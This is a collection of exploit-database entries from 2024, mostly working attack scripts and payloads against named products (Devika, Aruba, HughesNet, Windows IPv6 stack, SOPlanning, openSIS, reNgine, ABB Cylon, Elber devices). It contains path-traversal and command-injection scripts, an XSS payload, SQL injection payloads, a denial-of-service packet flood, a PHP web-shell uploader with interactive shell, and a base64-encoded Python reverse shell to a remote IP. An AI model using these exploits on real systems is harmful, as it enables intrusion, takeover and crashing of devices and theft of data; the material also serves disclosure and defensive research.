
# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422

#!/usr/bin/python

import argparse
import requests

def exploit(target_url):
    """Issue one GET to the snapshot endpoint with a traversal value and print the body.

    Args:
        target_url: host (optionally host:port) of the Devika instance; the
            ``http://`` scheme is prepended here.

    The response text is printed verbatim; no status code or error check is
    performed, so a 404/500 page is printed just like a successful read.
    """
    endpoint = f'http://{target_url}/api/get-browser-snapshot'
    # The vulnerable parameter: the server uses it as a filesystem path without
    # confining it to the snapshot directory.
    query = {'snapshot_path': '../../../../etc/passwd'}
    print(requests.get(endpoint, params=query).text)

if __name__ == "__main__":
    # CLI entry point: one required -t/--target option, handed straight to exploit().
    cli = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
    cli.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
    opts = cli.parse_args()
    exploit(opts.target)
            
#Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2024-07-31
#Vendor : Genexus
#Version : Genexus Protection Server 9.7.2.10
#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
#Vendor Homepage :  https://www.genexus.com/es/
#Tested on OS: Windows 10 Pro

# PoC analysis:
==============

C:\>sc qc protsrvservice
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: protsrvservice
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : ProtSrvService
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem
            
# Exploit Title: Remote Command Execution | Aurba 501
# Date: 17-07-2024
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.hpe.com
# Version: Aurba 501 CN12G5W0XX
# Tested on: Linux

import requests
from requests.auth import HTTPBasicAuth


def get_input(prompt, default_value):
    """Prompt on stdin and fall back to *default_value* on an empty answer.

    Args:
        prompt: text shown to the user.
        default_value: value returned when the user enters nothing.

    Returns:
        The raw line typed by the user (whitespace included, newline stripped
        by ``input``), or ``default_value`` when that line is empty.
    """
    answer = input(prompt)
    if answer:
        return answer
    return default_value


base_url = input("Enter the base URL: ")  # scheme + host; also reused verbatim as the Origin header below
if not base_url:
    print("Base URL is required.")
    exit(1)  # NOTE(review): site.py's exit(), not sys.exit(); fine for a script, absent under `python -S`

username = get_input("Enter the username (default: admin): ", "admin")
password = get_input("Enter the password (default: admin): ", "admin")


# Form login against /login.cgi; the field names mirror the device's login form.
login_url = f"{base_url}/login.cgi"
login_payload = {
    "username": username,
    "password": password,
    "login": "Login"
}


login_headers = {
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": base_url,
    "Connection": "close"
}

# A single session so whatever cookie the login response sets is carried into the ping request.
session = requests.Session()


# Every request below passes verify=False (TLS certificate validation disabled); this line
# only silences the InsecureRequestWarning that requests would otherwise emit per call.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Login to the system
response = session.post(login_url, headers=login_headers, data=login_payload, verify=False)

# Check if login was successful
# Success is inferred only from a 200 status plus the absence of the text "login failed";
# any other page served with a 200 is treated as a successful login.
if response.status_code == 200 and "login failed" not in response.text.lower():
    print("Login successful!")
    
    # The command to be executed on the device
    command = "cat /etc/passwd"
    
    # Injection point: the ping target is sent as "<ip>||<command>". The PoC presumably
    # relies on the device passing ping_ip to a shell unescaped, so the `||` list operator
    # would run `command` when ping fails. From a defender's side, a ping_ip value carrying
    # shell metacharacters instead of a bare address is the signature to alert on.
    ping_ip = f"4.2.2.4||{command}"
    
    # Data to be sent in the POST request
    data = {
        "ping_ip": ping_ip,
        "ping_timeout": "1",
        "textareai": "",
        "ping_start": "Ping"
    }
    
    # Headers to be sent with the request
    headers = {
        "Accept-Encoding": "gzip, deflate, br",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": base_url,
        "Referer": f"{base_url}/admin.cgi?action=ping",
        "Connection": "close"
    }
    
    # Sending the HTTP POST request to exploit the vulnerability
    # Log view: an authenticated POST to admin.cgi?action=ping whose ping_ip field is not a plain address.
    exploit_url = f"{base_url}/admin.cgi?action=ping"
    response = session.post(exploit_url, headers=headers, data=data, verify=False)
    
    
    # Loose success check: any response *header* value containing the substring "root"
    # counts, since (per the message printed below) the output is reflected into headers,
    # not the body. An unrelated header containing "root" would false-positive.
    if any("root" in value for value in response.headers.values()):
        print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")
        print(response.headers)
    else:
        print("Exploit failed. The response headers did not contain the expected output.")
else:
    print("Login failed. Please check the credentials and try again.")

# Print the response headers for further analysis
# `response` is whichever request ran last: the ping response on success, the login response otherwise.
print(response.headers)
            
# Exploit Title: Stored XSS Vulnerability via File Name
# Google Dork: N/A
# Date: 08 Aug 2024
# Exploit Author: Md. Sadikul Islam
# Vendor Homepage: https://www.helpdeskz.com/
# Software Link: https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip
# Version: v2.0.2
# Tested on: Kali Linux /  Firefox 115.1.0esr (64-bit)
# CVE : N/A

Payload: "><img src=x onerror=alert(1);>
Filename can be Payload: "><img src=x onerror=alert(1);>.jpg

Video PoC:
https://drive.google.com/file/d/1_yh0UsX8h7YcSU1kFvg_bBwk9T7kx1K1/view?usp=drive_link

Steps to Reproduce:
    1. Log in as a regular user and create a new ticket.
    2. Fill out all the required fields with the necessary information.
    3. Attach an image file with a malicious payload embedded in the filename.
    4. Submit the ticket.
    5. Access the ticket from the administration panel to trigger the payload execution.

Cross-Site Scripting (XSS) exploits can compromise the administration
panel, directly affecting administrators by allowing malicious scripts to
execute within their privileged environment.
            
Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) Summary: Wayber II is the name of an analogue/digital microwave link able to transport a Mono or a MPX stereo signal from studio to audio transmitter. Compact and reliable, it features very high quality and modern technology both in signal processing and microwave section leading to outstanding performances. Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. 
-------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5822 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5822.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd)

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.5.179 Revision 904 1.5.56 Revision 884 1.229 Revision 440 Summary: ESE (Elber Satellite Equipment) product line, designed for the high-end radio contribution and distribution market, where quality and reliability are most important. The Elber IRD (Integrated Receiver Decoder) ESE-01 offers a professional audio quality (and composite video) at an excellent quality/price ratio. The development of digital satellite contribution networks and the need to connect a large number of sites require a cheap but reliable and performing satellite receiver with integrated decoder. Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5821 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 
'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc.

HughesNet HT2000W Satellite Modem - Password Reset

# Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset # Date: 7/16/24 # Exploit Author: Simon Greenblatt <simongreenblatt[at]protonmail.com> # Vendor: HughesNet # Version: Arcadyan httpd 1.0 # Tested on: Linux # CVE: CVE-2021-20090 import sys import requests import re import base64 import hashlib import urllib red = "\033[0;41m" green = "\033[1;34;42m" reset = "\033[0m" def print_banner(): print(green + ''' _____________ _______________ _______________ ________ ____ _______________ _______ _______________ \_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/_ | \_____ \ _ \ \ _ \/ __ \ _ \ / \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ | | ______ / ____/ /_\ \/ /_\ \____ / /_\ \ \ \____\ / | \ /_____/ / \ \_/ \/ \ | | /_____/ / \ \_/ \ \_/ \ / /\ \_/ \ \______ / \___/ /_______ / \_______ \_____ /\_______ \|___| \_______ \_____ /\_____ //____/ \_____ / \/ \/ \/ \/ \/ \/ \/ \/ \/ \n''' + reset) print(" Administrator password reset for HughesNet HT2000W Satellite Modem") print(''' Usage: python3 hughes_ht2000w_pass_reset.py <password> <ip_address> <password>: The new administrator password <ip_address>: The IP address of the web portal. If none is provided, the script will default to 192.168.42.1\n This script takes advantage of CVE-2021-20090, a path traversal vulnerability in the HTTP daemon of the HT2000W modem to reset the administrator password of the configuration portal. 
It also takes advantage of other vulnerabilities in the device such as improper use of httokens for authentication and the portal allowing the MD5 hash of the password to be leaked.''') return None def get_httoken(ip_address): # Make a GET request to system_p.htm using path traversal r = requests.get(f'http://{ip_address}/images/..%2fsystem_p.htm') if r.status_code != 200: print(red + f"(-) Failure: Could not request system_p.htm" + reset) exit() # Extract the httoken hidden in the DOM and convert it from Base64 return base64.b64decode(re.search(r'AAAIBRAA7(.*?)"', r.text).group(1)).decode('ascii') def encode_pass(password): # Vigenere Cipher key = "wg7005d" enc_pass = "" idx = 0 for c in password: enc_pass += str(ord(c) + ord(key[idx])) + "+" idx = (idx + 1) % len(key) return enc_pass def change_pass(ip_address, httoken, enc_pass): # Create a POST request with the httoken and the encoded password headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'http://{ip_address}/system_p.htm'} payload = {'action': 'ui_system_p', 'httoken': httoken, 'submit_button': 'system_p.htm', 'ARC_SYS_Password': enc_pass} payload = urllib.parse.urlencode(payload, safe=':+') try: r = requests.post(f'http://{ip_address}/images/..%2fapply_abstract.cgi', data = payload, headers = headers) except: pass return None def verify_pass(ip_address, new_pass): # Make a GET request to cgi_sys_p.js to verify password httoken = get_httoken(ip_address) headers = {'Referer': f'http://{ip_address}/system_p.htm'} r = requests.get(f'http://{ip_address}/images/..%2fcgi/cgi_sys_p.js?_tn={httoken}', headers = headers) if r.text.split('"')[5] != hashlib.md5(bytes(new_pass, 'ascii')).hexdigest(): print(red + "(-) Failure: Could not verify the hash of the password" + reset) exit() def main(): if not (len(sys.argv) == 2 or len(sys.argv) == 3): print_banner() return new_pass = sys.argv[1] ip_address = "192.168.42.1" if sys.argv == 3: ip_address = sys.argv[2] httoken = get_httoken(ip_address) 
print(f"[+] Obtained httoken: {httoken}") enc_pass = encode_pass(new_pass) change_pass(ip_address, httoken, enc_pass) print(f"[+] Password reset to: {new_pass}") verify_pass(ip_address, new_pass) print("[+] Verified password hash: " + hashlib.md5(bytes(new_pass, 'ascii')).hexdigest()) print("[+] Password successfully changed!") return if __name__ == '__main__': main()

Windows TCP/IP - RCE Checker and Denial of Service

#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service # Date: 2024-08-07 # Exploit Author: Photubias # Vendor Homepage: https://microsoft.com # Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063 # Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189 # Tested on: Windows 11 23H2 and Windows Server 2022 # CVE: CVE-2024-38063 import os, subprocess, re, time, sys ## Variables sDstIP = 'fe80::78b7:6283:49ad:c565' ## Placeholder if len(sys.argv) > 1: sDstIP = sys.argv[1] ## Please provide an argument sDstMAC = '00:0C:29:55:E1:C8' ## Not required, will try to get the MAC via Neighbor Discovery iBatches = 20 iCorruptions = 20 ## How many times do we want to corrupt the tcpip.sys memory per batch try: print('--- Loading Scapy, might take some time ...') from scapy.config import conf conf.ipv6_enabled = False import scapy.all as scapy scapy.conf.verb = 0 except: print('Error while loading scapy, please run "pip install scapy"') exit(1) import logging logging.getLogger('scapy.runtime').setLevel(logging.ERROR) def selectInterface(): #adapter[] = npfdevice, ip, mac def getAllInterfaces(): lstInterfaces=[] if os.name == 'nt': proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE) for bInterface in proc.stdout.readlines(): lstInt = bInterface.split(b',') sAdapter = lstInt[0].strip(b'"').decode() sDevicename = lstInt[1].strip(b'"').decode() sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':') sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:] proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE) try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0] except: sIP = '' if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no 
or bad MAC address (e.g. PPP adapter), do not add else: proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE) for bInterface in proc.stdout.readlines(): lstInt = bInterface.strip().split(b' ') try: if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', '']) except: pass return lstInterfaces lstInterfaces = getAllInterfaces() if len(lstInterfaces) > 1: i = 1 for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0])) i += 1 #sAnswer = input('[?] Please select the adapter [1]: ') sAnswer='3' else: sAnswer = None if not sAnswer or sAnswer == '' or not sAnswer.isdigit() or int(sAnswer) >= i: sAnswer = 1 iAnswer = int(sAnswer) - 1 sNPF = lstInterfaces[iAnswer][0] sIP = lstInterfaces[iAnswer][1] sMAC = lstInterfaces[iAnswer][2] if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4] return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3]) def get_packets(iID, sDstIPv6, sDstMac=None): iFragID = 0xbedead00 + iID oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')]) oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) / 'notalive' oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1) if sDstMac: ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1 oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2 oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3 return [oPacket1, oPacket2, oPacket3] def doIPv6ND(sDstIP, 
sInt): ## Try to get a MAC address via IPv6 Neighbour Sollicitation sMACResp = None oNeighborSollicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff') oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt) if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse: sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr return sMACResp lstInt = selectInterface() ## NPF, IPv6, MAC, Name sMAC = doIPv6ND(sDstIP, lstInt[0]) if sMAC: print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}') sDstMAC = sMAC elif sDstMAC != '': print('[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}'.format(sDstMAC)) else: print('[-] Without a MAC address, this exploit will probably not work') lstPacketsToSend = [] for i in range(iBatches): for j in range(iCorruptions): lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC) ## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better) print('[i] Verifying vulnerability against IPv6 address {}'.format(sDstIP)) ## Verification first: "ICMPv6ParamProblem" lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5) if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]: print('[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063'.format(sDstIP)) else: input('[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue') print('[i] Waiting 10 seconds to let the target cool down (more is better)') time.sleep(10) input('[?] OK, continue to execute the Denial Of Service (BSOD)? 
Press Ctrl+C to cancel now') ########## Exploit print('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3])) scapy.conf.verb = 1 scapy.sendp(lstPacketsToSend, iface=lstInt[0]) print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash')
# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exploit(username, password, url): target_url = f"{url}/process/login.php" upload_url = f"{url}/process/upload.php" link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6)) php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php" login_data = {"login":username,"password":password} res = requests.post(target_url, data=login_data, allow_redirects=False) cookies = res.cookies multipart_form_data = { "linkid": link_id, "periodeid": 0, "fichiers": php_filename, "type": "upload" } web_shell = "<?php system($_GET['cmd']); ?>" files = { 'fichier-0': (php_filename, web_shell, 'application/x-php') } upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data) if upload_res.status_code == 200 and "File" in upload_res.text: print(f"[+] Uploaded ===> {upload_res.text}") print("[+] Exploit completed.") exploit_url = f"{url}/upload/files/{link_id}/{php_filename}" print(f"Access webshell here: {exploit_url}?cmd=<command>") if "yes" == input("Do you want an interactive shell? 
(yes/no) "): try: while True: command_shell(exploit_url) except Exception as e: raise(f"Error: {e}") else: pass def main(): parser = argparse.ArgumentParser(prog="SOplanning RCE", \ usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin") parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True) parser.add_argument("-u", "--username",type=str,help="username", required=True) parser.add_argument("-p", "--password",type=str,help="password", required=True) args = parser.parse_args() exploit(args.username, args.password, args.target) main()

openSIS 9.1 - SQLi (Authenticated)

# Exploit Title: openSIS 9.1 - SQLi (Authenticated) # Google Dork: intext:"openSIS is a product" # Date: 09.09.2024 # Exploit Author: Devrim Dıragumandan (d0ub1edd) # Vendor Homepage: https://www.os4ed.com/ # Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1 # Version: 9.1 # Tested on: Linux A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. GET /Ajax.php?modname=x HTTP/1.1 --- Parameter: X-Forwarded-For #1* ((custom) HEADER) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae --- FIX: https://github.com/OS4ED/openSIS-Classic/pull/322

reNgine 2.2.0 - Command Injection (Authenticated)

# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated) # Date: 2024-09-29 # Exploit Author: Caner Tercan # Vendor Homepage: https://rengine.wiki/ # Software Link: https://github.com/yogeshojha/rengine # Version: v2.2.0 # Tested on: macOS POC : 1. Login the Rengine Platform 2. Click the Scan Engine 3. Modify any Scan Engine 4. I modified nmap_cmd parameters on yml config 5. Finally, add a target in the targets section, select the scan engine you edited and start scanning. payload : 'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #’

ABB Cylon Aspect 3.07.02 - File Disclosure

# Exploit Title : ABB Cylon Aspect 3.07.02 - File Disclosure Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.07.02 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The building management system suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'downloadDb.php' script is not properly verified before being used to download database files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5831 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5831.php 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' 
'` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl "http://192.168.73.31/downloadDb.php?file=../../../../../../../../etc/passwd" \ > -H "Cookie: PHPSESSID=xxx" root:x:0:0:root:/home/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 